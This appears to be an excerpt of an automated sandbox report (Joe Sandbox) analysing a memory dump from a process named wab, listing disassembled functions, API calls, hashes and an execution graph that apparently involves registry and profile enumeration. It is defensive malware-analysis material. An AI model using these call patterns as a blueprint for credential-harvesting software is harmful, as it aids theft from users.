                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FilePointer_memicmpmemcpy
                      • String ID: URL
                      • API String ID: 2108176848-3574463123
                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                      Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintfmemcpy
                      • String ID: %2.2X
                      • API String ID: 2789212964-323797159
                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                      Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintf
                      • String ID: %%-%d.%ds
                      • API String ID: 3988819677-2008345750
                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                      Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040E770
                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSendmemset
                      • String ID: F^@
                      • API String ID: 568519121-3652327722
                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                      Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PlacementWindowmemset
                      • String ID: WinPos
                      • API String ID: 4036792311-2823255486
                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                      Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • wcsrchr.MSVCRT ref: 0040DCE9
                      • wcscat.MSVCRT ref: 0040DCFF
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileModuleNamewcscatwcsrchr
                      • String ID: _lng.ini
                      • API String ID: 383090722-1948609170
                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                      Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                      • API String ID: 2773794195-880857682
                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                      Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                      Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$memset
                      • String ID:
                      • API String ID: 1860491036-0
                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                      Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • memcmp.MSVCRT ref: 00408AF3
                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                      • memcmp.MSVCRT ref: 00408B2B
                      • memcmp.MSVCRT ref: 00408B5C
                      • memcpy.MSVCRT ref: 00408B79
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID:
                      • API String ID: 231171946-0
                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                      Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcslen$wcscat$wcscpy
                      • String ID:
                      • API String ID: 1961120804-0
                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                      Execution Graph

                      Execution Coverage:2.4%
                      Dynamic/Decrypted Code Coverage:20.4%
                      Signature Coverage:0.5%
                      Total number of Nodes:849
                      Total number of Limit Nodes:16
                      execution_graph 34109 40fc40 70 API calls 34282 403640 21 API calls 34110 427fa4 42 API calls 34283 412e43 _endthreadex 34284 425115 76 API calls __fprintf_l 34285 43fe40 133 API calls 34113 425115 83 API calls __fprintf_l 34114 401445 memcpy memcpy DialogBoxParamA 34115 440c40 34 API calls 33238 444c4a 33257 444e38 33238->33257 33240 444c56 GetModuleHandleA 33241 444c68 __set_app_type __p__fmode __p__commode 33240->33241 33243 444cfa 33241->33243 33244 444d02 __setusermatherr 33243->33244 33245 444d0e 33243->33245 33244->33245 33258 444e22 _controlfp 33245->33258 33247 444d13 _initterm __getmainargs _initterm 33248 444d6a GetStartupInfoA 33247->33248 33250 444d9e GetModuleHandleA 33248->33250 33259 40cf44 33250->33259 33254 444dcf _cexit 33256 444e04 33254->33256 33255 444dc8 exit 33255->33254 33257->33240 33258->33247 33310 404a99 LoadLibraryA 33259->33310 33261 40cf60 33296 40cf64 33261->33296 33317 410d0e 33261->33317 33263 40cf6f 33321 40ccd7 ??2@YAPAXI 33263->33321 33265 40cf9b 33335 407cbc 33265->33335 33270 40cfc4 33353 409825 memset 33270->33353 33271 40cfd8 33358 4096f4 memset 33271->33358 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33277 407e30 _strcmpi 33280 40cfee 33277->33280 33382 407948 ??3@YAXPAX ??3@YAXPAX 33278->33382 33279->33278 33282 40cff2 RegDeleteKeyA 33280->33282 33283 40d007 EnumResourceTypesA 33280->33283 33282->33276 33285 40d047 33283->33285 33286 40d02f MessageBoxA 33283->33286 33284 40d1c4 33383 4080d4 ??3@YAXPAX 33284->33383 33288 40d0a0 CoInitialize 33285->33288 33363 40ce70 33285->33363 33286->33276 33380 40cc26 strncat memset RegisterClassA CreateWindowExA 33288->33380 33290 40d1cd 33384 407948 ??3@YAXPAX ??3@YAXPAX 33290->33384 33292 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33381 40c256 PostMessageA 33292->33381 33296->33254 33296->33255 33297 40d061 ??3@YAXPAX 33297->33278 33300 40d084 DeleteObject 33297->33300 33298 40d09e 33298->33288 33300->33278 33302 40d0f9 GetMessageA 33303 40d17b 33302->33303 33304 40d10d 33302->33304 33303->33276 33305 40d113 TranslateAccelerator 33304->33305 33307 40d145 IsDialogMessage 33304->33307 33308 40d139 IsDialogMessage 33304->33308 33305->33304 33306 40d16d GetMessageA 33305->33306 33306->33303 33306->33305 33307->33306 33309 40d157 TranslateMessage DispatchMessageA 33307->33309 33308->33306 33308->33307 33309->33306 33311 404ac4 GetProcAddress 33310->33311 33313 404ae8 33310->33313 33312 404add FreeLibrary 33311->33312 33314 404ad4 33311->33314 33312->33313 33315 404b13 33313->33315 33316 404afc MessageBoxA 33313->33316 33314->33312 33315->33261 33316->33261 33318 410d17 LoadLibraryA 33317->33318 33319 410d3c 33317->33319 33318->33319 33320 410d2b GetProcAddress 33318->33320 33319->33263 33320->33319 33322 40cd08 ??2@YAPAXI 33321->33322 33324 40cd26 33322->33324 33325 40cd2d 33322->33325 33392 404025 6 API calls 33324->33392 33327 40cd66 33325->33327 33328 40cd59 DeleteObject 33325->33328 33385 407088 33327->33385 33328->33327 33330 40cd6b 33388 4019b5 33330->33388 33333 4019b5 strncat 33334 40cdbf _mbscpy 33333->33334 33334->33265 33394 407948 ??3@YAXPAX ??3@YAXPAX 33335->33394 33337 407e04 33395 407a55 33337->33395 33340 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33347 407cf7 33340->33347 33341 407ddc 33341->33337 33407 407a1f 33341->33407 33343 407d7a ??3@YAXPAX 33343->33347 33347->33337 33347->33340 33347->33341 33347->33343 33398 40796e 7 API calls 33347->33398 33399 406f30 33347->33399 33349 407e30 33350 407e38 33349->33350 33351 407e57 33349->33351 33350->33351 33352 407e41 _strcmpi 33350->33352 33351->33270 33351->33271 33352->33350 33352->33351 33413 4097ff 33353->33413 33355 409854 33418 409731 33355->33418 33359 4097ff 3 API calls 33358->33359 33360 409723 33359->33360 33438 40966c 33360->33438 33452 4023b2 33363->33452 33369 40ced3 33541 40cdda 7 API calls 33369->33541 33370 40cece 33373 40cf3f 33370->33373 33493 40c3d0 memset GetModuleFileNameA strrchr 33370->33493 33373->33297 33373->33298 33376 40ceed 33520 40affa 33376->33520 33380->33292 33381->33302 33382->33284 33383->33290 33384->33296 33393 406fc7 memset _mbscpy 33385->33393 33387 40709f CreateFontIndirectA 33387->33330 33389 4019e1 33388->33389 33390 4019c2 strncat 33389->33390 33391 4019e5 memset LoadIconA 33389->33391 33390->33389 33391->33333 33392->33325 33393->33387 33394->33347 33396 407a65 33395->33396 33397 407a5b ??3@YAXPAX 33395->33397 33396->33349 33397->33396 33398->33347 33400 406f37 malloc 33399->33400 33401 406f7d 33399->33401 33403 406f73 33400->33403 33404 406f58 33400->33404 33401->33347 33403->33347 33405 406f6c ??3@YAXPAX 33404->33405 33406 406f5c memcpy 33404->33406 33405->33403 33406->33405 33408 407a38 33407->33408 33409 407a2d ??3@YAXPAX 33407->33409 33410 406f30 3 API calls 33408->33410 33411 407a43 33409->33411 33410->33411 33412 40796e 7 API calls 33411->33412 33412->33337 33429 406f96 GetModuleFileNameA 33413->33429 33415 409805 strrchr 33416 409814 33415->33416 33417 409817 _mbscat 33415->33417 33416->33417 33417->33355 33430 44b090 33418->33430 33423 40930c 3 API calls 33424 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33423->33424 33425 4097c5 LoadStringA 33424->33425 33428 4097db 33425->33428 33427 4097f3 33427->33276 33428->33425 33428->33427 33437 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33428->33437 33429->33415 33431 40973e _mbscpy _mbscpy 33430->33431 33432 40930c 33431->33432 33433 44b090 33432->33433 33434 409319 memset GetPrivateProfileStringA 33433->33434 33435 409374 33434->33435 33436 409364 WritePrivateProfileStringA 33434->33436 33435->33423 33436->33435 33437->33428 33448 406f81 GetFileAttributesA 33438->33448 33440 409675 33441 4096ee 33440->33441 33442 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33440->33442 33441->33277 33449 409278 GetPrivateProfileStringA 33442->33449 33444 4096c9 33450 409278 GetPrivateProfileStringA 33444->33450 33446 4096da 33451 409278 GetPrivateProfileStringA 33446->33451 33448->33440 33449->33444 33450->33446 33451->33441 33543 409c1c 33452->33543 33455 401e69 memset 33582 410dbb 33455->33582 33458 401ec2 33612 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33612 33459 401ed4 33597 406f81 GetFileAttributesA 33459->33597 33462 401ee6 strlen strlen 33464 401f15 33462->33464 33465 401f28 33462->33465 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33464->33613 33598 406f81 GetFileAttributesA 33465->33598 33468 401f35 33599 401c31 33468->33599 33471 401f75 33611 410a9c RegOpenKeyExA 33471->33611 33473 401c31 7 API calls 33473->33471 33474 401f91 33475 402187 33474->33475 33476 401f9c memset 33474->33476 33478 402195 ExpandEnvironmentStringsA 33475->33478 33479 4021a8 _strcmpi 33475->33479 33614 410b62 RegEnumKeyExA 33476->33614 33623 406f81 GetFileAttributesA 33478->33623 33479->33369 33479->33370 33481 40217e RegCloseKey 33481->33475 33482 401fd9 atoi 33483 401fef memset memset sprintf 33482->33483 33491 401fc9 33482->33491 33615 410b1e 33483->33615 33486 402165 33486->33481 33487 406f81 GetFileAttributesA 33487->33491 33488 402076 memset memset strlen strlen 33488->33491 33489 4070e3 strlen _mbscat _mbscpy _mbscat 33489->33491 33490 4020dd strlen strlen 33490->33491 33491->33481 33491->33482 33491->33486 33491->33487 33491->33488 33491->33489 33491->33490 33492 402167 _mbscpy 33491->33492 33622 410b62 RegEnumKeyExA 33491->33622 33492->33481 33494 40c422 33493->33494 33495 40c425 _mbscat _mbscpy _mbscpy 33493->33495 33494->33495 33496 40c49d 33495->33496 33497 40c512 33496->33497 33498 40c502 GetWindowPlacement 33496->33498 33499 40c538 33497->33499 33644 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33497->33644 33498->33497 33637 409b31 33499->33637 33503 40ba28 33504 40ba87 33503->33504 33510 40ba3c 33503->33510 33647 406c62 LoadCursorA SetCursor 33504->33647 33506 40ba43 _mbsicmp 33506->33510 33507 40ba8c 33648 4107f1 33507->33648 33651 403c16 33507->33651 33727 410a9c RegOpenKeyExA 33507->33727 33728 404734 33507->33728 33736 404785 33507->33736 33508 40baa0 33509 407e30 _strcmpi 33508->33509 33513 40bab0 33509->33513 33510->33504 33510->33506 33739 40b5e5 10 API calls 33510->33739 33511 40bafa SetCursor 33511->33376 33513->33511 33514 40baf1 qsort 33513->33514 33514->33511 34102 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33520->34102 33522 40b00e 33523 40b016 33522->33523 33524 40b01f GetStdHandle 33522->33524 34103 406d1a CreateFileA 33523->34103 33526 40b01c 33524->33526 33527 40b035 33526->33527 33528 40b12d 33526->33528 34104 406c62 LoadCursorA SetCursor 33527->34104 34108 406d77 9 API calls 33528->34108 33531 40b136 33542 40c580 28 API calls 33531->33542 33532 40b087 33539 40b0a1 33532->33539 34106 40a699 12 API calls 33532->34106 33533 40b042 33533->33532 33533->33539 34105 40a57c strlen WriteFile 33533->34105 33536 40b0d6 33537 40b116 CloseHandle 33536->33537 33538 40b11f SetCursor 33536->33538 33537->33538 33538->33531 33539->33536 34107 406d77 9 API calls 33539->34107 33541->33370 33542->33373 33555 409a32 33543->33555 33546 409c80 memcpy memcpy 33547 409cda 33546->33547 33547->33546 33548 409d18 ??2@YAPAXI ??2@YAPAXI 33547->33548 33552 408db6 12 API calls 33547->33552 33549 409d54 ??2@YAPAXI 33548->33549 33550 409d8b 33548->33550 33549->33550 33565 409b9c 33550->33565 33552->33547 33554 4023c1 33554->33455 33556 409a44 33555->33556 33557 409a3d ??3@YAXPAX 33555->33557 33558 409a52 33556->33558 33559 409a4b ??3@YAXPAX 33556->33559 33557->33556 33560 409a63 33558->33560 33561 409a5c ??3@YAXPAX 33558->33561 33559->33558 33562 409a83 ??2@YAPAXI ??2@YAPAXI 33560->33562 33563 409a73 ??3@YAXPAX 33560->33563 33564 409a7c ??3@YAXPAX 33560->33564 33561->33560 33562->33546 33563->33564 33564->33562 33566 407a55 ??3@YAXPAX 33565->33566 33567 409ba5 33566->33567 33568 407a55 ??3@YAXPAX 33567->33568 33569 409bad 33568->33569 33570 407a55 ??3@YAXPAX 33569->33570 33571 409bb5 33570->33571 33572 407a55 ??3@YAXPAX 33571->33572 33573 409bbd 33572->33573 33574 407a1f 4 API calls 33573->33574 33575 409bd0 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bda 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409be4 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409bee 33580->33581 33581->33554 33583 410d0e 2 API calls 33582->33583 33584 410dca 33583->33584 33585 410dfd memset 33584->33585 33624 4070ae 33584->33624 33586 410e1d 33585->33586 33627 410a9c RegOpenKeyExA 33586->33627 33590 401e9e strlen strlen 33590->33458 33590->33459 33591 410e4a 33592 410e7f _mbscpy 33591->33592 33628 410d3d _mbscpy 33591->33628 33592->33590 33594 410e5b 33629 410add RegQueryValueExA 33594->33629 33596 410e73 RegCloseKey 33596->33592 33597->33462 33598->33468 33630 410a9c RegOpenKeyExA 33599->33630 33601 401c4c 33602 401cad 33601->33602 33631 410add RegQueryValueExA 33601->33631 33602->33471 33602->33473 33604 401c6a 33605 401c71 strchr 33604->33605 33606 401ca4 RegCloseKey 33604->33606 33605->33606 33607 401c85 strchr 33605->33607 33606->33602 33607->33606 33608 401c94 33607->33608 33632 406f06 strlen 33608->33632 33610 401ca1 33610->33606 33611->33474 33612->33459 33613->33465 33614->33491 33635 410a9c RegOpenKeyExA 33615->33635 33617 410b34 33618 410b5d 33617->33618 33636 410add RegQueryValueExA 33617->33636 33618->33491 33620 410b4c RegCloseKey 33620->33618 33622->33491 33623->33479 33625 4070bd GetVersionExA 33624->33625 33626 4070ce 33624->33626 33625->33626 33626->33585 33626->33590 33627->33591 33628->33594 33629->33596 33630->33601 33631->33604 33633 406f17 33632->33633 33634 406f1a memcpy 33632->33634 33633->33634 33634->33610 33635->33617 33636->33620 33638 409b40 33637->33638 33640 409b4e 33637->33640 33645 409901 memset SendMessageA 33638->33645 33641 409b99 33640->33641 33642 409b8b 33640->33642 33641->33503 33646 409868 SendMessageA 33642->33646 33644->33499 33645->33640 33646->33641 33647->33507 33649 410807 33648->33649 33650 4107fc FreeLibrary 33648->33650 33649->33508 33650->33649 33652 4107f1 FreeLibrary 33651->33652 33653 403c30 LoadLibraryA 33652->33653 33654 403c74 33653->33654 33655 403c44 GetProcAddress 33653->33655 33656 4107f1 FreeLibrary 33654->33656 33655->33654 33657 403c5e 33655->33657 33658 403c7b 33656->33658 33657->33654 33661 403c6b 33657->33661 33659 404734 3 API calls 33658->33659 33660 403c86 33659->33660 33740 4036e5 33660->33740 33661->33658 33664 4036e5 26 API calls 33665 403c9a 33664->33665 33666 4036e5 26 API calls 33665->33666 33667 403ca4 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403cae 33668->33669 33752 4085d2 33669->33752 33677 403ce5 33678 403cf7 33677->33678 33933 402bd1 39 API calls 33677->33933 33798 410a9c RegOpenKeyExA 33678->33798 33681 403d0a 33682 403d1c 33681->33682 33934 402bd1 39 API calls 33681->33934 33799 402c5d 33682->33799 33686 4070ae GetVersionExA 33687 403d31 33686->33687 33817 410a9c RegOpenKeyExA 33687->33817 33689 403d51 33690 403d61 33689->33690 33935 402b22 46 API calls 33689->33935 33818 410a9c RegOpenKeyExA 33690->33818 33693 403d87 33694 403d97 33693->33694 33936 402b22 46 API calls 33693->33936 33819 410a9c RegOpenKeyExA 33694->33819 33697 403dbd 33698 403dcd 33697->33698 33937 402b22 46 API calls 33697->33937 33820 410808 33698->33820 33702 404785 FreeLibrary 33703 403de8 33702->33703 33824 402fdb 33703->33824 33706 402fdb 34 API calls 33707 403e00 33706->33707 33840 4032b7 33707->33840 33716 403e3b 33718 403e73 33716->33718 33719 403e46 _mbscpy 33716->33719 33887 40fb00 33718->33887 33939 40f334 334 API calls 33719->33939 33727->33508 33729 404785 FreeLibrary 33728->33729 33730 40473b LoadLibraryA 33729->33730 33731 40474c GetProcAddress 33730->33731 33734 40476e 33730->33734 33732 404764 33731->33732 33731->33734 33732->33734 33733 404781 33733->33508 33734->33733 33735 404785 FreeLibrary 33734->33735 33735->33733 33737 4047a3 33736->33737 33738 404799 FreeLibrary 33736->33738 33737->33508 33738->33737 33739->33510 33741 4037c5 33740->33741 33742 4036fb 33740->33742 33741->33664 33940 410863 UuidFromStringA UuidFromStringA memcpy 33742->33940 33744 40370e 33744->33741 33745 403716 strchr 33744->33745 33745->33741 33746 403730 33745->33746 33941 4021b6 memset 33746->33941 33748 40373f _mbscpy _mbscpy strlen 33749 4037a4 _mbscpy 33748->33749 33750 403789 sprintf 33748->33750 33942 4023e5 16 API calls 33749->33942 33750->33749 33753 4085e2 33752->33753 33943 4082cd 11 API calls 33753->33943 33757 408600 33758 403cba 33757->33758 33759 40860b memset 33757->33759 33770 40821d 33758->33770 33946 410b62 RegEnumKeyExA 33759->33946 33761 4086d2 RegCloseKey 33761->33758 33763 408637 33763->33761 33764 40865c memset 33763->33764 33947 410a9c RegOpenKeyExA 33763->33947 33950 410b62 RegEnumKeyExA 33763->33950 33948 410add RegQueryValueExA 33764->33948 33767 408694 33949 40848b 10 API calls 33767->33949 33769 4086ab RegCloseKey 33769->33763 33951 410a9c RegOpenKeyExA 33770->33951 33772 40823f 33773 403cc6 33772->33773 33774 408246 memset 33772->33774 33782 4086e0 33773->33782 33952 410b62 RegEnumKeyExA 33774->33952 33776 4082bf RegCloseKey 33776->33773 33778 40826f 33778->33776 33953 410a9c RegOpenKeyExA 33778->33953 33954 4080ed 11 API calls 33778->33954 33955 410b62 RegEnumKeyExA 33778->33955 33781 4082a2 RegCloseKey 33781->33778 33956 4045db 33782->33956 33784 4088ef 33964 404656 33784->33964 33788 408737 wcslen 33788->33784 33794 40876a 33788->33794 33789 40877a _wcsncoll 33789->33794 33791 404734 3 API calls 33791->33794 33792 404785 FreeLibrary 33792->33794 33793 408812 memset 33793->33794 33795 40883c memcpy wcschr 33793->33795 33794->33784 33794->33789 33794->33791 33794->33792 33794->33793 33794->33795 33796 4088c3 LocalFree 33794->33796 33967 40466b _mbscpy 33794->33967 33795->33794 33796->33794 33797 410a9c RegOpenKeyExA 33797->33677 33798->33681 33968 410a9c RegOpenKeyExA 33799->33968 33801 402c7a 33802 402da5 33801->33802 33803 402c87 memset 33801->33803 33802->33686 33969 410b62 RegEnumKeyExA 33803->33969 33805 402d9c RegCloseKey 33805->33802 33806 402cb2 33806->33805 33807 410b1e 3 API calls 33806->33807 33816 402d9a 33806->33816 33973 402bd1 39 API calls 33806->33973 33974 410b62 RegEnumKeyExA 33806->33974 33808 402ce4 memset sprintf 33807->33808 33970 410a9c RegOpenKeyExA 33808->33970 33810 402d28 33811 402d3a sprintf 33810->33811 33971 402bd1 39 API calls 33810->33971 33972 410a9c RegOpenKeyExA 33811->33972 33816->33805 33817->33689 33818->33693 33819->33697 33821 410816 33820->33821 33822 4107f1 FreeLibrary 33821->33822 33823 403ddd 33822->33823 33823->33702 33975 410a9c RegOpenKeyExA 33824->33975 33826 402ff9 33827 403006 memset 33826->33827 33828 40312c 33826->33828 33976 410b62 RegEnumKeyExA 33827->33976 33828->33706 33830 403122 RegCloseKey 33830->33828 33831 410b1e 3 API calls 33832 403058 memset sprintf 33831->33832 33977 410a9c RegOpenKeyExA 33832->33977 33834 4030a2 memset 33978 410b62 RegEnumKeyExA 33834->33978 33835 410b62 RegEnumKeyExA 33839 403033 33835->33839 33837 